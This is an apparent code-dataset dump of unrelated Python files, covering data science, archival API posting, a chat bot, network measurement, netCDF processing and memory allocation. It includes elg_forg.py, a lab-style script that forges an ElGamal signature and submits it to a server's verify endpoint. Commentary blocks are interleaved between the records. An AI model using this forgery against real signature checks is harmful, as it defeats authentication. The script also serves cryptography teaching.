]\n","sub_path":"simplemooc/simplemooc/simplemooc/courses/migrations/0004_auto_20150724_1924.py","file_name":"0004_auto_20150724_1924.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"485869018","text":"# -*- coding: utf-8 -*-\n\nfrom sklearn.metrics import 
cohen_kappa_score\nfrom sklearn.metrics import make_scorer\n#from tmfeatures import TMFeatureExtractor\nfrom sklearn.model_selection import train_test_split\nfrom imblearn.datasets import make_imbalance\nfrom sklearn.preprocessing import LabelEncoder\n#import matplotlib.pyplot as plt\nfrom collections import Counter\nimport xgboost as xgb\n#import seaborn as sns\nimport pandas as pd\nimport numpy as np\n#import glob\nimport os\n\n#####\n# Helper Functions\n####\n\ndef kappa(y_true, y_pred):\n \"\"\"\n kappa score calculator\n \"\"\"\n return cohen_kappa_score(y_true, y_pred, weights='quadratic')\n\n\ndef PetsByRescuerID(df):\n \"\"\"\n Input: dataset\n Output: returns the number of pets with same RescuerID on PetsByRescuerID\n \"\"\"\n rescuer_count = df.groupby(['RescuerID'])['PetID'].count().reset_index()\n rescuer_count.columns = ['RescuerID', 'PetsByRescuerID']\n df = df.merge(rescuer_count, how='left', on='RescuerID')\n return df\n\ndef PetsByState(df):\n \"\"\"\n Input: dataset\n Output: returns the total number of pets per state\n \"\"\"\n petsbystate_count = df.groupby(['State'])['PetID'].count().reset_index()\n petsbystate_count.columns = ['State', 'PetsByState']\n df = df.merge(petsbystate_count, how='left', on='State')\n return df\n\ndef PetsbyBreed(df):\n \"\"\"\n Input: dataset\n Output: returns the number of pets per Breed\n \"\"\"\n PetAdoptedTheMost_count = df.groupby(['Breed1'])['PetID'].count().reset_index()\n PetAdoptedTheMost_count.columns = ['Breed1', 'Total']\n df = df.merge(PetAdoptedTheMost_count, how='left', on='Breed1')\n return df\n\ndef PureBreed(df):\n \"\"\"\n Input: dataset\n Output: set dataframe with pure column\n \"\"\"\n df['PureBreed'] = np.where(df.Breed2 == 0, 1,0)\n \ndef StringToNumer(df, label):\n label_encoder = LabelEncoder()\n df[label] = label_encoder.fit_transform(df[label])\n train[label].head()\n\ndef ratio_func(y, multiplier, minority_class):\n target_stats = Counter(y)\n return {minority_class: int(multiplier * target_stats[minority_class])}\n\ndef balance_data(df):\n X = df.drop(['AdoptionSpeed','PetID', 'Description', 'Name'], axis=1)\n col_names = X.columns\n y = df.AdoptionSpeed \n # Sampling for class 4\n X_4, y_4 = make_imbalance(X, y, sampling_strategy=ratio_func,\n **{\"multiplier\": 0.098,\n \"minority_class\": 4})\n #print(Counter(y_4)) \n # Sampling for class 3\n X_3, y_3 = make_imbalance(X_4, y_4, sampling_strategy=ratio_func,\n **{\"multiplier\": 0.126,\n \"minority_class\": 3})\n #print(Counter(y_3))\n \n # Sampling for class 4\n X_2, y_2 = make_imbalance(X_3, y_3, sampling_strategy=ratio_func,\n **{\"multiplier\": 0.102,\n \"minority_class\": 2})\n #print(Counter(y_2))\n \n # Sampling for class 4\n X_1, y_1 = make_imbalance(X_2, y_2, sampling_strategy=ratio_func,\n **{\"multiplier\": 0.1,\n \"minority_class\": 1})\n print(Counter(y_1))\n \n \n X_1 = pd.DataFrame(X_1)\n y_1 = pd.DataFrame(y_1)\n \n X_1.columns = col_names\n\n return X_1, y_1\n \n\n#####\n# Load Data\n####\nDATA_FOLDER = '../input/'\n\ntrain = pd.read_csv(os.path.join(DATA_FOLDER,'train/train.csv')) # Tabular/text data for the training set\ntest = pd.read_csv(os.path.join(DATA_FOLDER,'test/test.csv')) # Tabular/text data for the test set\nsub = pd.read_csv(os.path.join(DATA_FOLDER,'sample_submission.csv')) # A sample submission file in the correct format\nbreeds = pd.read_csv(os.path.join(DATA_FOLDER,'breed_labels.csv')) # Contains Type, and BreedName for each BreedID. 
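# Quadratic-weighted Cohen's kappa -- the metric wrapped by kappa()/make_scorer
# above -- rewards near-misses on an ordinal scale: an off-by-one prediction is
# penalised far less than a distant one. The labels below are made up.
from sklearn.metrics import cohen_kappa_score

y_true = [0, 1, 2, 3, 4, 4]
near   = [0, 1, 2, 3, 3, 4]   # one prediction off by a single class
far    = [4, 1, 2, 3, 1, 4]   # two predictions far from the truth
print(cohen_kappa_score(y_true, near, weights='quadratic'))  # high, close to 1
print(cohen_kappa_score(y_true, far, weights='quadratic'))   # much lower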
Type 1 is dog, 2 is cat.\ncolors = pd.read_csv(os.path.join(DATA_FOLDER,'color_labels.csv')) # Contains ColorName for each ColorID\nstates = pd.read_csv(os.path.join(DATA_FOLDER,'state_labels.csv')) # Contains StateName for each StateID\n\n\n#####\n# Data Visualization\n####\n# plot the samples\n#plt.scatter(train.Age, train.Fee, c=train.AdoptionSpeed, cmap=plt.cm.Paired, edgecolors='k')\n# Check label's data distribution\n#plt.hist(train.AdoptionSpeed)\n\n\n# \"Class Imbalance Problem\" : https://datascience.stackexchange.com/questions/13990/how-to-deal-with-a-skewed-data-set-having-all-the-samples-almost-similar\n\n\n#####\n# Data Transformation \n####\n\ntrain = PetsByRescuerID(train)\ntest = PetsByRescuerID(test)\n\ntrain = PetsByState(train)\ntest = PetsByState(test)\n\nPureBreed(train)\nPureBreed(test)\n\n# Transform RescueID string to numbers\nStringToNumer(train,\"RescuerID\")\nStringToNumer(test,\"RescuerID\")\n\nX_resample, y_resample = balance_data(train)\n\n\n### This is in process\n#path_to_sentiment_folder = os.path.join(DATA_FOLDER,'train_sentiment/*')\n#train_sentiment_files = glob.glob(path_to_sentiment_folder)\n#tm_extractor = TMFeatureExtractor(normalization=False)\n#df_sentiment_train = tm_extractor.parse_sentiment_files(train_sentiment_files)\n#######\n\n\n\n#####\n# Data Preprocessing\n####\ntarget2 = train['AdoptionSpeed']\nclean_df = train.drop(columns=['Name', 'Description', 'PetID', 'AdoptionSpeed'])\nclean_test = test.drop(columns=['Name', 'Description', 'PetID'])\n\nx_normalized = X_resample\ntarget = y_resample\nX_test = clean_test\n\n# Split for final validation\nX_train2, X_valid2, y_train2, y_valid2 = train_test_split(clean_df, target2, test_size=0.2, random_state=42)\n# Split data\nX_train, X_valid, y_train, y_valid = train_test_split(x_normalized, target, test_size=0.2, random_state=42)\n\nprint(\"X_train.shape: {}, X_valid.shape: {}\".format(X_train.shape, X_valid.shape))\n#plt.hist(y_train)\n#plt.hist(y_valid)\n#####\n# Modeling\n####\n# Preparation for XGBoost\nd_train = xgb.DMatrix(X_train, label=y_train)\nd_valid = xgb.DMatrix(X_valid, label=y_valid)\n\nwatchlist = [(d_train, 'train'), (d_valid, 'valid')]\n\nxgb_params = {'objective' : 'multi:softmax',\n 'eval_metric' : 'mlogloss',\n 'eta' : 0.05,\n 'max_depth' : 4,\n 'num_class' : 5,\n 'lambda' : 0.8\n}\n\nprint('Fitting XGBoost: ')\nbst = xgb.train(xgb_params, d_train, 400, watchlist, early_stopping_rounds=50, verbose_eval=0)\nscorer = make_scorer(kappa)\n\n\n#####\n# Testing\n####\nscore = kappa(bst.predict(xgb.DMatrix(X_valid)).astype(int), y_valid)\nname = 'XGBoost'\nprint('{} score: {}'.format(str(name), round(score, 5)))\n\n\nscore = kappa(bst.predict(xgb.DMatrix(X_valid2)).astype(int), y_valid2)\nname = 'XGBoost'\nprint('{} score: {}'.format(str(name), round(score, 5)))\n\n#####\n# Generate results\n####\n\npreds = bst.predict(xgb.DMatrix(X_test)).astype(int)\nresults = pd.DataFrame({'PetID': test.PetID, 'AdoptionSpeed': preds})\n#results.to_csv('submission.csv', index = False)","sub_path":"petfinder/data_analysis.py","file_name":"data_analysis.py","file_ext":"py","file_size_in_byte":6818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"575022069","text":"import json, time, runtime\nfrom asnake.client import ASnakeClient\nfrom asnake.client.web_client import ASnakeAuthError\n\n# Create a client\nclient = ASnakeClient()\nclient.authorize() # login, using default values\n\n# print instructions\nprint (\"This script will add the 
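# Editor's sketch of the XGBoost multi-class round trip used above, reduced to
# synthetic data so it runs stand-alone; the parameters echo the record, but
# the data does not come from it.
import numpy as np
import xgboost as xgb

X = np.random.rand(200, 6)
y = np.random.randint(0, 5, size=200)
d_train = xgb.DMatrix(X, label=y)
params = {'objective': 'multi:softmax', 'eval_metric': 'mlogloss',
          'num_class': 5, 'eta': 0.05, 'max_depth': 4}
bst = xgb.train(params, d_train, num_boost_round=20)
preds = bst.predict(xgb.DMatrix(X)).astype(int)  # class labels 0..4
print(preds[:10])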
container_profiles included in a separate json file to ArchivesSpace.\")\ninput(\"Press Enter to continue...\")\n\n# post container_profiles\nprint (\"The following container profiles have been added to ArchivesSpace:\")\njsonfile = open(\"containerProfiles.json\")\njsonfile = json.load(jsonfile)\nfor container_profile in jsonfile:\n post = client.post(\"/container_profiles\", json=container_profile).json()\n print (post)\n\nprint (\"You've just completed your first API POST. Congratulations!\")\n","sub_path":"postContainerProfiles.py","file_name":"postContainerProfiles.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"481593249","text":"from vkBot.settings import *\nfrom vkBot.controllers.message_process import *\n\n\ndef parse_vk_case(data):\n if data['type'] == 'confirmation':\n return vk_confirmation_token\n elif data['type'] == 'message_new':\n user_id = data['object']['user_id']\n message = data['object']['body']\n return process_message(user_id, message, source=0)\n elif data['type'] == 'message_allow':\n user_id = data['object']['user_id']\n return process_allow_messaging(user_id=user_id, source=0)\n","sub_path":"vkBot/controllers/vk_controller.py","file_name":"vk_controller.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"223981127","text":"#!/usr/bin/python3.4\n\n# Repeats an experiment after a sleep time of 30 minutes\n# Receiver version\n# Author Gloire Rubambiza\n# Version 07/02/2017\n\nimport subprocess\nfrom subprocess import TimeoutExpired\nimport time\n\n# Get the directory where to send the file for an experiment\ndirectory = subprocess.check_output(\"./Dir_Creation\", universal_newlines=True)\nprint(\"The day's directory is %s\", directory)\ndirectory = directory[:26]\nprint(\"The new day's directory is %s\", str(directory))\n\n# To be used as the template of return codes\n# It is supposed to be 0, i.e. 
 success every time\nreturn_code = subprocess.call([\"ls\", \"-l\"])\nprint(\"The return code is %s\" % return_code)\n\n\n# Repeat the process until the end of daily experiments\n# Send the output to the file of the day\nwhile return_code == 0:\n\ttry:\n\t\tfilename = subprocess.check_output([\"./FileCreation\"], universal_newlines=True)\n\t\tfilename = filename[:37]\n\texcept subprocess.CalledProcessError as cpe:\n\t\tprint(\"Process of file creation failed!\\n\")\n\t\tprint(\"The return code was %d\\n\" % cpe.returncode)\n\t\tprint(\"The output is %s\" % str(cpe.output))\n\n\ttry:\n\t\t# An example of a sender's IP address\n\t\tsender = \"35.185.253.131\"\n\t\treturn_code = subprocess.call([\"./pathload_rcv\", \"-s\", sender, \"-o\", filename])\n\texcept TimeoutExpired:\n\t\tprint(\"The child process is done running pathload\\n\")\n\n\t# Check the return code before going to sleep\n\t# If successful, move the file to its right directory\n\tif return_code != 0:\n\t\tprint(\"Return code error, child process failed\")\n\telse:\n\t\treturn_code = subprocess.call([\"mv\", filename, directory])\n\t\ttrace_filename = filename[:34] + \"_trace\"\n\t\tt_open = open(trace_filename, \"w\")\n\t\ttry:\n\t\t\treturn_code = subprocess.call([\"traceroute\", sender], stdout=t_open)\n\t\t\tt_open.close()\n\t\t\treturn_code = subprocess.call([\"mv\", trace_filename, directory])\n\t\texcept TimeoutExpired:\n\t\t\tprint(\"The traceroute was not successful!\\n\")\n\ttime.sleep(60*5)\n","sub_path":"pathload_and_traceroute_experiments/sender_receiver_files/ReceiverJapan.py","file_name":"ReceiverJapan.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"550174355","text":"'''\nCreated on Sep 9, 2016\n\n@author: chogg\n'''\nimport os\nimport argparse\nimport sys\nimport numpy\nimport netCDF4\nimport netCDF4.utils\nfrom netCDF4 import netcdftime\nimport netcdftime\nfrom netCDF4 import Dataset\nfrom datetime import datetime\n\ndef process_files(path_base):\n    \n    file_name = ''.join([path_base,\"\\\\\",\"tmin.nc\"])\n    with Dataset(file_name, 'w', format=\"NETCDF4_CLASSIC\") as ds:\n        \n        ds.createDimension(\"time\", None)\n        ds.createDimension(\"y\", 647)\n        ds.createDimension(\"x\", 602)\n        \n        albers = ds.createVariable(\"albers_conical_equal_area\", \"S1\")\n        setattr(albers, \"grid_mapping_name\", \"albers_conical_equal_area\")\n        setattr(albers, \"false_easting\", 0.0)\n        setattr(albers, \"false_northing\", 0.0)\n        setattr(albers, \"latitude_of_projection_origin\", 23.0)\n        setattr(albers, \"longitude_of_central_meridian\", -84.0)\n        setattr(albers, \"standard_parallel\", (29.5, 45.5))\n        setattr(albers, \"longitude_of_prime_meridian\", 0.0)\n        setattr(albers, \"semi_major_axis\", 6378137.0)\n        setattr(albers, \"inverse_flattening\", 298.257222101)\n        setattr(albers, \"spatial_ref\", \"PROJCS[\\\"unnamed\\\",GEOGCS[\\\"NAD83\\\",DATUM[\\\"North_American_Datum_1983\\\",SPHEROID[\\\"GRS
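# Editor's note on the loop above: subprocess.call() only raises
# TimeoutExpired when a timeout argument is passed, so those except branches
# never fire as written. Below, a sketch of the modern pattern
# (subprocess.run, Python 3.7+, newer than the 3.4 shebang above); the host
# name is illustrative.
import subprocess

try:
    result = subprocess.run(
        ['traceroute', 'example.org'],
        capture_output=True, text=True,
        timeout=60 * 5, check=True,
    )
    print(result.stdout)
except subprocess.TimeoutExpired:
    print('traceroute did not finish in time')
except subprocess.CalledProcessError as cpe:
    print('traceroute failed with return code %d' % cpe.returncode)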
1980\\\",6378137,298.257222101,AUTHORITY[\\\"EPSG\\\",\\\"7019\\\"]],TOWGS84[0,0,0,0,0,0,0],AUTHORITY[\\\"EPSG\\\",\\\"6269\\\"]],PRIMEM[\\\"Greenwich\\\",0,AUTHORITY[\\\"EPSG\\\",\\\"8901\\\"]],UNIT[\\\"degree\\\",0.0174532925199433,AUTHORITY[\\\"EPSG\\\",\\\"9108\\\"]],AUTHORITY[\\\"EPSG\\\",\\\"4269\\\"]],PROJECTION[\\\"Albers_Conic_Equal_Area\\\"],PARAMETER[\\\"standard_parallel_1\\\",29.5],PARAMETER[\\\"standard_parallel_2\\\",45.5],PARAMETER[\\\"latitude_of_center\\\",23],PARAMETER[\\\"longitude_of_center\\\",-84],PARAMETER[\\\"false_easting\\\",0],PARAMETER[\\\"false_northing\\\",0],UNIT[\\\"METERS\\\",1]]\")\n setattr(albers, \"GeoTransform\", \"-478000 1524 0 1460296 0 -1524 \")\n \n precip = ds.createVariable(\"tmin\",'f4',(['time','y','x']), fill_value=-9999.0)\n setattr(precip, \"long_name\", \"Minimum Daily Temperature\")\n setattr(precip, \"units\", \"Degrees Fahrenheit\")\n setattr(precip, \"missing_value\", -9999.0)\n setattr(precip, \"grid_mapping\", \"albers_conical_equal_area\")\n \n time = ds.createVariable(\"time\",'f8',('time'))\n setattr(time, \"standard_name\", \"time\")\n setattr(time, \"units\", \"hour since 1895-01-01 00:00:00\")\n setattr(time, \"calendar\", \"standard\")\n \n x = ds.createVariable(\"x\",'f8',('x'))\n setattr(x, \"long_name\", \"x coordinate of projection\")\n setattr(x, \"standard_name\", \"projection_x_coordinate\")\n setattr(x, \"units\", \"m\")\n \n y = ds.createVariable(\"y\",'f8',('y'))\n setattr(y, \"long_name\", \"y coordinate of projection\")\n setattr(y, \"standard_name\", \"projection_y_coordinate\")\n setattr(y, \"units\", \"m\")\n \n directories = ['']\n file_types = ['.nc']\n xy_data = False\n for root, sub_folders, files in os.walk(path_base):\n nc_index = 0\n for file_in_root in files:\n format_path = root.replace(path_base,'')\n if format_path in directories:\n index = file_in_root.rfind('.')\n if file_in_root[index:] in file_types:\n current_file = '\\\\'.join([root,file_in_root])\n tmin, x, y = None, None, None\n \n if current_file != file_name:\n with Dataset(current_file, 'a') as ds:\n p_val = ds.variables[\"minimum daily temp\"]\n tmin = p_val[:,:]\n \n x_val = ds.variables[\"x\"]\n x = x_val[:]\n \n y_val = ds.variables[\"y\"]\n y = y_val[:]\n \n with Dataset(file_name, 'a') as ds:\n p_val = ds.variables[\"tmin\"]\n p_val[nc_index,:,:] = tmin\n \n if xy_data == False:\n x_val = ds.variables[\"x\"]\n x_val[:] = x\n \n y_val = ds.variables[\"y\"]\n y_val[:] = y\n \n xy_data = True\n \n time = ds.variables[\"time\"]\n time[nc_index] = nc_index * 24\n \n nc_index += 1\n \n \nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('directory',\n help='directory location to process netCDF files')\n# parser.add_argument('file_type',\n# help='type of file to concatenate')\n# \n args = parser.parse_args(sys.argv[1:])\n# \n# \n# code = process_files(args.directory)\n process_files(args.directory)\n \n print('Done processing tmin.nc!\\n')","sub_path":"frozen/tmin.py","file_name":"tmin.py","file_ext":"py","file_size_in_byte":5327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"217398831","text":"# Copyright 2019 Jianwei Zhang All Right Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# 
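# Editor's sketch of the netCDF4 pattern from the tmin.py record above:
# declare dimensions, create a variable with a fill value, attach attributes,
# and write one record. The file name and values are illustrative only.
import numpy as np
from netCDF4 import Dataset

with Dataset('example_tmin.nc', 'w', format='NETCDF4_CLASSIC') as ds:
    ds.createDimension('time', None)          # unlimited record dimension
    ds.createDimension('x', 4)
    tmin = ds.createVariable('tmin', 'f4', ('time', 'x'), fill_value=-9999.0)
    setattr(tmin, 'units', 'Degrees Fahrenheit')
    tmin[0, :] = np.array([31.5, 30.2, 29.8, 28.9])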
 distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# =================================================================================\n\nimport matplotlib.pyplot as plt\nfrom pathlib import Path\n\n\ndef compute_liver_tumor_hist(image, mask, liver_lab=1, tumor_lab=2, title=\"\",\n                             bins=50, xrng=(0, 200), alpha=0.8, density=True,\n                             yrng=(0, 1),\n                             show=True, save_path=None):\n    if not show and save_path is None:\n        raise ValueError(\"If not show, save_path must be provided.\")\n    liver_volume = image[mask == liver_lab]\n    tumor_volume = image[mask == tumor_lab]\n    val1, bin1, _ = plt.hist(liver_volume.flat, bins=bins, range=xrng, alpha=alpha, density=density)\n    val2, bin2, _ = plt.hist(tumor_volume.flat, bins=bins, range=xrng, alpha=alpha, density=density)\n    plt.ylim(yrng)\n    plt.legend([\"Liver HU intensity\", \"Tumor HU intensity\"])\n    plt.xlabel(\"Intensity in CT Sequence\")\n    plt.ylabel(\"Normalized bin count\")\n    plt.title(title)\n\n    if show:\n        plt.show()\n    else:\n        save_path = Path(save_path)\n        save_path.parent.mkdir(parents=True, exist_ok=True)\n        plt.savefig(str(save_path))\n        plt.close()\n\n    return val1, bin1, val2, bin2\n","sub_path":"data_kits/analysis_kits.py","file_name":"analysis_kits.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"636427115","text":"class MaxNum:\n    \"\"\"Requires no params when running\"\"\"\n\n    def __init__(self):\n        self.list = []\n        print(\"Input 3 numbers:\")\n        for i in range(3):\n            self.list.append(float(input()))\n        self.list.sort()\n        print(\"The maximum number among those numbers is : \", self.list[-1])\n\n\np13 = MaxNum()\n","sub_path":"Exercise/max_num.py","file_name":"max_num.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"599043454","text":"import os\nimport sys\nimport os.path\nsys.path.append(os.path.join(os.getcwd(), '..',))\nimport client as clt\nimport random as rnd\nfrom tools import *\nfrom fractions import gcd\n\nPARAM = \"Param\"\n\nELG_FORGERY = \"/ElGamal-forgery/\"\nPK = \"/PK\"\nVERIFY = \"/verify\"\n\nPK_URL = ELG_FORGERY + PK + NAME\nVERIFY_URL = ELG_FORGERY + VERIFY + NAME\n\nB = 'b'\nC = 'c'\nP = 'p'\nG = 'g'\nH = 'h'\nM = 'm'\nR = 0\nS = 1\nSIGNATURE = 'signature'\n\nPARAM_FILE = \"param.txt\"\n\n\ndef save_param(param_dict):\n\tparam = open(PARAM_FILE, 'w')\n\tprint(\"Saving parameters in file.\")\n\tparam.write(\"[{0}]\\n\".format(PARAM))\n\tfor key in param_dict.keys():\n\t\tparam.write(key + \"=\" + str(param_dict[key]) + \"\\n\")\n\tparam.close()\n\ndef compute_param(p, q):\n\t\"\"\"Compute the parameters needed to forge a new ElGamal signature.\n\tReturn a tuple of values (b, c).\"\"\"\n\tif os.path.exists(PARAM_FILE):\n\t\tprint(\"Parameters file exists.
Extracting parameters from file.\")\n\t\timport configparser as cp\n\t\tconfig = cp.ConfigParser()\n\t\tconfig.read(PARAM_FILE)\n\t\treturn config.getint(PARAM, B), config.getint(PARAM, C)\n\telse:\n\t\tb = rnd.randint(0,p)\n\t\tc = rnd.randint(0,p)\n\n\t\ti = 0\n\t\twhile gcd(c, q) != 1:\n\t\t\ti += 1\n\t\t\tc = rnd.randint(0,p)\n\t\t\tprint(\"Generation of a new c attemp \", str(i))\n\t\tsave_param({B : b, C : c})\n\t\treturn b, c\n\ndef check_sign(p, g, h, r, s, m):\n\tvalue = (pow(h, r, p) * pow(r, s, p)) % p\n\treturn value == pow(g, m, p);\n\ndef forge_sign(p, g, h):\n\tq = p - 1\n\n\tb, c = compute_param(p, q)\n\n\tr = (pow(g, b, p) * pow(h, c, p)) % p\n\ts = (-r * modinv(c, q)) % q\n\n\tm = (b*s) % q\n\tif check_sign(p, g, h, r, s, m): # Check if the signature is correct\n\t\treturn {M : m, SIGNATURE : (r, s)}\n\telse:\t\t\t\t\t\t# The signature are not correct\n\t\tprint(\"Bad signature. :-(\\nGoodbye.\")\n\t\texit(1)\n\n\ndef get_pubkey():\n\t\"\"\"Retrieve the public key of the PS3 on the server. Return a triplet\n\tof param (p, g, h)\"\"\"\n\tsrv = clt.Server(BASE_URL)\n\ttry:\n\t\tresult = srv.query(PK_URL)\n\texcept clt.ServerError as err:\n\t\tprint_serverError_exit(err)\n\treturn result[P], result[G], result[H]\n\nif __name__ == \"__main__\":\n\tp, g, h = get_pubkey()\n\n\tsign = forge_sign(p, g, h)\n\n\tsrv = clt.Server(BASE_URL)\n\ttry:\n\t\tresult = srv.query(VERIFY_URL, sign)\n\t\tprint(result[STATUS])\n\texcept clt.ServerError as err:\n\t\tprint_serverError_exit(err)\n","sub_path":"ElGamal-forgery/elg_forg.py","file_name":"elg_forg.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"644079392","text":"def firstfit(a,b):\r\n store=[]\r\n for x in a:\r\n check=checkAvailability(x,b)\r\n if check>=len(b):\r\n store.append(-1)\r\n pass\r\n else:\r\n counter=0\r\n for y in range(len(b)):\r\n if x<=b[y]:\r\n ind=y+1\r\n if ind not in store:\r\n store.append(ind)\r\n b[y]=0\r\n break\r\n else: counter=counter+1\r\n else:\r\n counter=counter+1\r\n return store\r\n\r\ndef checkAvailability(a,b):\r\n counter=0\r\n for y in b:\r\n if a>y:\r\n counter=counter+1\r\n return counter\r\n\r\nmyfile=[500,400,1000,600,700]\r\nblock=[500,200,700,800]\r\nblocksize=[500,200,700,800]\r\na=firstfit(myfile,block)\r\nprint(\"File Block Space left\")\r\nfor x in range(len(myfile)): \r\n blocknum=\"pending\"\r\n left=0\r\n block_size=0\r\n if a[x]>=1:\r\n blocknum=str(a[x])\r\n block_size=blocksize[a[x]-1]\r\n left=block_size-myfile[x]\r\n print(\" \"+str(x+1)+\" \"+str(myfile[x])+\" \"+blocknum+\" \"+str(block_size)+\" \"+str(left))\r\n ","sub_path":"oslab1b.py","file_name":"oslab1b.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"161961954","text":"#!/usr/bin/env python\nimport os\nimport h5py\nfrom geometry.source import source\nfrom geometry.receiver import receiver\nfrom geometry.shearZoneReceiver import shearZoneReceiver\nfrom export import *\n\nclass evolution(object):\n '''\n EVOLUTION is a class encapsulating the geometry and physical properties of \n fault patches for sources and receivers and methods for solving integral\n equations for fault slip.\n '''\n\n # fault self stress\n # KK[i,j] is traction s[j] due to fault slip d[i], where\n # s = {shear shear, dip shear, normal stress} and d={strike slip, dip slip}.\n KK = {}\n KK['ss'] = KK['sd'] = KK['sn'] = []\n KK['ds'] = KK['dd'] = 
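# The elg_forg.py record above implements the classic existential forgery
# against textbook ElGamal signatures: with r = g^b * h^c mod p and
# s = -r * c^(-1) mod q, the exponent of h^r * r^s is x*r + (b + x*c)*s,
# and c*s = -r (mod q) cancels the x terms, leaving g^(b*s) = g^m for
# m = b*s mod q. Self-contained check with toy parameters (p = 23, g = 5,
# h = g^6 = 8); pow(c, -1, q) needs Python 3.8+ and gcd(c, q) = 1.
def forge(p, g, h, b, c):
    q = p - 1
    r = (pow(g, b, p) * pow(h, c, p)) % p
    s = (-r * pow(c, -1, q)) % q
    m = (b * s) % q
    assert (pow(h, r, p) * pow(r, s, p)) % p == pow(g, m, p)
    return m, (r, s)

assert forge(23, 5, 8, 4, 7) == (2, (2, 6))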
KK['dn'] = []\n\n # stress on shear zone due to fault slip\n # KL[i,j] is stress s[j] due to slip d[i], where d={strike slip, dip slip}.\n KL = {}\n KL['s11'] = KL['s12'] = KL['s13'] = KL['s22'] = KL['s23'] = KL['s33'] = []\n KL['d11'] = KL['d12'] = KL['d13'] = KL['d22'] = KL['d23'] = KL['d33'] = []\n\n # traction on fault due to shear zone\n # LK[i,j] is traction s[j] due to strain e[i], where\n # e=[e11,e12,e13,22,e23,e33] and s={strike shear, dip shear, normal shear]\n LK = {}\n LK['s11'] = LK['d11'] = LK['n11'] = []\n LK['s12'] = LK['d12'] = LK['n12'] = []\n LK['s13'] = LK['d13'] = LK['n13'] = []\n LK['s22'] = LK['d22'] = LK['n22'] = []\n LK['s23'] = LK['d23'] = LK['n23'] = []\n LK['s33'] = LK['d33'] = LK['n33'] = []\n\n # shear zones self stress\n # LL[i,j] is stress s[j] due to e[i] where s=[s11,s12,s13,s22,s23,s33]\n # and e=[e11,e12,e13,22,e23,e33]\n LL = {}\n LL['1111'] = LL['1211'] = LL['1311'] = LL['2211'] = LL['2311'] = LL['3311'] = []\n LL['1112'] = LL['1212'] = LL['1312'] = LL['2212'] = LL['2312'] = LL['3312'] = []\n LL['1113'] = LL['1213'] = LL['1213'] = LL['2213'] = LL['2313'] = LL['3313'] = []\n LL['1122'] = LL['1222'] = LL['1322'] = LL['2222'] = LL['2322'] = LL['3322'] = []\n LL['1123'] = LL['1223'] = LL['1323'] = LL['2223'] = LL['2323'] = LL['3323'] = []\n LL['1133'] = LL['1233'] = LL['1333'] = LL['2233'] = LL['2333'] = LL['3333'] = []\n\n # fault stress due to continuous source\n # FK[i,j] is traction s[j] due to fault slip d[i], where\n # s = {shear shear, dip shear, normal stress} and d={strike slip, dip slip}.\n FK = {}\n FK['ss'] = FK['sd'] = FK['sn'] = []\n FK['ds'] = FK['dd'] = FK['dn'] = []\n\n # stress on shear zone due to continuous fault slip\n # FL[i,j] is stress s[j] due to slip d[i], where d={strike slip, dip slip}.\n FL = {}\n FL['s11'] = FL['s12'] = FL['s13'] = FL['s22'] = FL['s23'] = FL['s33'] = []\n FL['d11'] = FL['d12'] = FL['d13'] = FL['d22'] = FL['d23'] = FL['d33'] = []\n\n # coseismic events with slip distribution and stress kernels\n evt = []\n\n # source geometry and slip distribution\n src = []\n\n # fault receiver geometry\n flt = []\n\n # fault receiver geometry\n shz = []\n\n # simulation result (time and model)\n t = []\n y = []\n\n # kernel labels\n knl = []\n\n # kernel patch\n knlpath = []\n\n # constructor\n def __init__(self, src, flt, shz, evts, varargin):\n '''\n Constructor\n\n Input:\n src = instance of source\n flt = instance of recevier fault\n shz = instance of shear zone\n evts = list of cosiesmic events\n \n evl = ode.evolution(src, rcv)\n '''\n \n if isinstance(src, source) is True:\n self.src.N = 0\n self.src.dgf = 0\n if isinstance(shz, receiver) is True:\n self.shz.N = 0\n self.shz.dgf = 0\n if isinstance(flt, shearZoneReceiver) is True:\n self.flt.N = 0\n self.flt.dgf = 0\n \n # receiver faults\n self.flt = flt\n\n # receiver shear zones\n self.shz = shz\n\n # source faults\n self.src = src\n \n\n if len(varargin) > 0:\n self.knlpath = varargin[0]\n if os.path.exists(self.knlpath) is False:\n os.mkdir(self.knlpath)\n\n h5 = h5py.File(self.knlpath+'/greens.h5')\n # stress interactions\n if flt != None and isinstance(flt, receiver) is True:\n knl_KK = ['ss','sd','sn','ds','dd','dn']\n if len(varargin) == 0:\n self.KK = flt.tractionKernels(flt)\n else:\n if 'KK_ss' not in h5.keys():\n self.KK = flt.tractionKernels(flt)\n for i in knl_KK:\n h5.create_dataset('KK_'+i, data=self.KK[i], compression='gzip')\n else:\n for i in knl_KK:\n self.KK[i] = h5['KK_'+i][()]\n \n if len(shz) != 0:\n if flt != None or len(flt) != 0:\n knl_KL = 
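# A minimal sketch of the compute-or-load kernel caching that this evolution
# class repeats for its KK/KL/LK/LL kernels, assuming h5py; factoring it out
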